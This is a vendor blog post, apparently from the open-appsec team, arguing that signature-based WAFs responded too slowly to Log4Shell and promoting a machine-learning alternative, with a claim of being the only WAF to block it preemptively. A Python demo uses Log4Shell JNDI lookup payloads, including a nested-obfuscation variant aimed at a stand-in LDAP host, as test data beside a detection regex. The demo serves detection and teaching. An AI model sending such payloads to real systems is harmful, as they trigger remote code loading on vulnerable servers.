On September 27th, 2022 Forrester released a WAF vendor review, “The 12 Providers That Matter Most and How They Stack Up.” The report analyzes various aspects of vendors’ WAF offerings, including the quality of dealing with Attacks, Configuration and Management, Product Vision, Support and other criteria.
A special focus of the review is given to how vendors dealt with the well-known Log4Shell zero-day attack in late 2021, a security event that kept many people in the IT industry working around the clock for days.
The Forrester report and some vendor follow-up comments offer an interesting demonstration of what is expected from WAF solutions today, and of how low that bar is set, especially regarding zero-days. They imply it is acceptable to have solutions many hours, and even days, after vulnerabilities are known.
Yet in other security domains, such as anti-malware and email security, the expectation today is real-time and preemptive threat prevention. I want to raise some concerns about WAF security today and suggest some possible solutions that raise the bar on what we should expect. Attackers act quickly. We can't afford to wait hour after hour before we can react to threats.
Zero-days and Vulnerability Windows
A zero-day attack or zero-day exploit leverages an unknown vulnerability in either hardware or software. It's called a zero-day because at the point at which the exploit is discovered, developers have had "zero days" to implement a fix for the underlying vulnerability.
Attackers take advantage of the window between the discovery of a new vulnerability until it is mitigated. They quickly implement exploits and automated scripts and look for targets. This happens within hours.
Cloudflare CEO tweet shortly after the Log4Shell zero-day hit the news (embedded in the original post):
Today’s low bar for WAF solution response times
We cannot provide excerpts from the full report (it is available for download after payment), but a blog post issued by Forrester after publishing the report is an interesting demonstration of today’s low bar of expectations from WAF solutions, especially around zero-days.
“Vendors responded quickly to Log4Shell issues. Log4Shell was an avalanche of panic and work for security pros last year, and with WAF as one of the key defense points, we wondered how quickly vendors were able to help their customers and how well they communicated. It was a pleasant surprise to see that top vendors had issued new rules within hours or by the next day, posting regular blogs with updates and even hosting events to help customers understand the issues. Customer references were uniformly pleased with their vendors’ responses.”
Cloudflare, a truly great technology and cloud service company and one of the two Leaders selected in the Forrester report (the second one is Akamai), writes in its blog post celebrating the result:
“We believe that we scored the highest possible score in the Log4Shell criterion due to our fast response to the announcement, by ensuring that all customers using the Cloudflare WAF were protected against the exploit in less than 17 hours globally.
In the following weeks from the initial announcement, we updated WAF rules several times following discovery of multiple variations of attack payloads.”
From my perspective, we should not be celebrating a 17-hour response time. We should be relentlessly searching for better solutions.
WAF Solutions and Signatures
The Forrester review covers 12 vendors and uses the following inclusion criteria:
· A comprehensive, enterprise class WAF offering
· Support for hybrid-cloud and multi-cloud application deployments
· $20M or more in global WAF revenue
All leading WAF solutions today, including the 12 mentioned in the Forrester report and others, are based on signatures, an approach that became very popular with ModSecurity and the Core Rule Set (CRS) and has served the industry well over the last 20 years.
Signature-based solutions are well proven, but they are reactive by nature: a signature cannot be written until the vulnerability or exploit it describes is known, so signatures often become available only after vulnerabilities have been public for some time and exploits are already in circulation. As such, they provide an insufficient response to modern, fast-spreading attacks such as Log4Shell.
As you can see in the list below, all the noted WAF vendors issued signatures only after the Log4j vulnerability was published:
AWS WAF - https://aws.amazon.com/security/security-bulletins/AWS-2021-005/
Azure WAF - https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
F5 BIG-IP ASM/Advanced WAF - https://support.f5.com/csp/article/K19026212
Akamai WAF - https://www.akamai.com/blog/news/CVE-2021-44228-Zero-Day-Vulnerability
Fortinet FortiWeb - https://www.fortiguard.com/updates/websecurity?version=0.00305
ModSecurity - https://www.reddit.com/r/AskNetsec/comments/rdz43x/looking_for_modsecurity_rules_to_block_log4j_rce/
Palo Alto Networks WAAS - https://www.paloaltonetworks.com/blog/prisma-cloud/log-4-shell-vulnerability/
Reblaze - https://www.reblaze.com/blog/cloud-security/securing-a-critical-apache-log-vulnerability/
Wallarm - https://lab.wallarm.com/cve-2021-44228-mitigation-update/
Citrix WAF - https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/
Kemp - https://support.kemptechnologies.com/hc/en-us/articles/4416473820045
Cisco Talos - https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
Preemptive Protection against Zero Day Attacks
I think that we need to change expectations and provide security that prevents attacks, instead of only chasing them. Preemptive protection against cyber attacks is critical because vulnerabilities may have been known by bad actors before they were announced in public, and because it naturally takes time for administrators to patch the holes, creating a security risk that’s known as a “vulnerability window”.
Source: Cambridge Dictionary
Using machine learning techniques, it is possible today to block attacks such as Log4Shell preemptively and automatically, without the need for signature updates.
open-appsec, an open-source project developed by our team, uses contextual analysis to learn how users normally interact with your web application. It then uses this information to automatically detect requests that fall outside of normal operations, and sends those requests for further analysis to decide whether the request is malicious or not. This preemptive model removes the risk of a vulnerability window, and eliminates the need for rushed patching activities.
The engine is powered by two different machine learning models:
· A supervised model that was trained offline and fed with millions of requests, both malicious and benign.
· An unsupervised online model that is built in real time in the protected environment. The online model is updated constantly based on inbound network traffic.
In the case of Log4j, open-appsec had several indicators in the supervised ML model from the Command Injection, Remote Code Execution and Probing families that signaled the payloads as malicious with a very high score, which resulted in the attack being blocked automatically. A similar detection and block happened with the Spring4Shell zero-day a few months later.
To our knowledge, open-appsec and CloudGuard AppSec (which share the same engine) were the only WAF solutions on the market able to preemptively block Log4Shell attacks, including later variants, without software updates and using default product settings. See the original post from December 14th, 2021 for a detailed technical explanation.
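To make the contrast between the signature model described in the “WAF Solutions and Signatures” section and the learned-baseline model described above concrete, here is an added example (not code from open-appsec or from any vendor named in this post). It runs a first-day literal signature and a deliberately small per-field baseline, a stand-in for the unsupervised online model, over the same constructed requests. The baseline learns which character classes each request field normally carries and how long values get; anything outside that envelope is escalated for a second-stage decision, which is the flow the post describes. The training traffic, the test requests, the field names and the escalation threshold are all assumptions made up for the demo.

```python
"""Constructed comparison of a static signature check and a learned per-field
baseline on the same sample requests. The baseline is a deliberately small
stand-in for the unsupervised online model the post describes; it is not
open-appsec's engine, and the traffic below is made up for the demo."""
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

Request = Dict[str, str]

# Constructed benign traffic used to learn the baseline (not real logs).
TRAINING_REQUESTS: List[Request] = [
    {"path": "/search", "q": "running shoes", "ua": "Mozilla/5.0 (X11; Linux x86_64) Firefox/95.0"},
    {"path": "/search", "q": "blue jeans size 32", "ua": "Mozilla/5.0 (Macintosh) Safari/605.1.15"},
    {"path": "/cart", "q": "", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/96.0"},
    {"path": "/search", "q": "gift cards", "ua": "curl/7.79.1"},
]

# Constructed test traffic: a benign request, the canonical lookup string,
# and a nested-lookup variant of the kind vendors wrote follow-up rules for.
TEST_REQUESTS: List[Request] = [
    {"path": "/search", "q": "winter jacket", "ua": "Mozilla/5.0 (Windows NT 10.0) Chrome/96.0"},
    {"path": "/search", "q": "socks", "ua": "${jndi:ldap://example.invalid/x}"},
    {"path": "/search", "q": "socks", "ua": "${${lower:j}ndi:ldap://example.invalid/x}"},
]

# The first-day signature: a literal match on the lookup prefix.
SIGNATURE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def signature_match(req: Request) -> bool:
    """Reactive check: true only for the exact pattern the rule already knows."""
    return any(SIGNATURE.search(v) for v in req.values())


def char_class(ch: str) -> str:
    """Coarse character classes so a small training set still generalizes."""
    if ch.isalpha():
        return "alpha"
    if ch.isdigit():
        return "digit"
    if ch in " .,-_/:;()":
        return "punct"      # punctuation that ordinary values carry
    return "other"          # $ { } quotes, angle brackets, and so on


class FieldBaseline:
    """What one request field normally looks like: classes seen and longest value."""

    def __init__(self) -> None:
        self.classes: Counter = Counter()
        self.max_len = 0
        self.samples = 0

    def observe(self, value: str) -> None:
        self.classes.update(char_class(c) for c in value)
        self.max_len = max(self.max_len, len(value))
        self.samples += 1

    def score(self, value: str) -> float:
        """0.0 = fits the learned envelope; 1.0 = clearly outside it."""
        if self.samples == 0:
            return 1.0      # never-seen field: nothing to compare against
        novelty = 1.0 if any(self.classes[char_class(c)] == 0 for c in value) else 0.0
        stretch = max(0.0, (len(value) - self.max_len) / max(self.max_len, 1))
        return min(1.0, novelty + stretch)


def build_baseline(requests: List[Request]) -> Dict[str, FieldBaseline]:
    model: Dict[str, FieldBaseline] = defaultdict(FieldBaseline)
    for req in requests:
        for field, value in req.items():
            model[field].observe(value)
    return model


def baseline_score(model: Dict[str, FieldBaseline], req: Request) -> float:
    return max(model[field].score(value) for field, value in req.items())


ESCALATE_AT = 0.5   # assumed threshold: above it the request goes to second-stage analysis


def evaluate(requests: List[Request]) -> List[Tuple[bool, bool]]:
    """Per request: (signature hit, baseline escalates)."""
    model = build_baseline(TRAINING_REQUESTS)
    return [(signature_match(r), baseline_score(model, r) >= ESCALATE_AT) for r in requests]


if __name__ == "__main__":
    for req, (sig, ml) in zip(TEST_REQUESTS, evaluate(TEST_REQUESTS)):
        print(f"signature={sig!s:5} baseline={ml!s:5}  ua={req['ua']}")
```

The benign request scores 0.0 on both checks. The canonical lookup string is caught by both. The nested variant slips past the literal signature, which is exactly why vendors had to ship further rule updates, while the baseline escalates it because the User-Agent field had never carried `$`, `{` or `}` in the learned traffic. The same mechanism also escalates any field the model has not yet observed, which is why the post sends anomalies to a second stage rather than blocking on the baseline alone.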
Preemptive protection against cyber attacks is critical because vulnerabilities may have been known to bad actors before publication, and because it naturally takes time for everyone to patch them, a period known as the “vulnerability window”.
The Forrester report and some vendor commentaries provide an interesting demonstration of today’s low bar of expectations for WAF solutions, especially around zero-days. Unfortunately, it is considered acceptable to have solutions many hours and even days after vulnerabilities are known.
I think that it’s time to raise the bar, similar to how anti-malware was improved, by looking for solutions that use preemptive models by default. With widespread, scaled use, a preemptive ML approach can eliminate the bulk of the threats that disrupt organizations, consume IT and security resources, and present excessive risk.
In today's environment of tested and proven ML, there is no reason to rely on outdated technology and accept low expectations for protection. Rather than celebrate 17-hour response times, let’s work together to remove the need for response times altogether.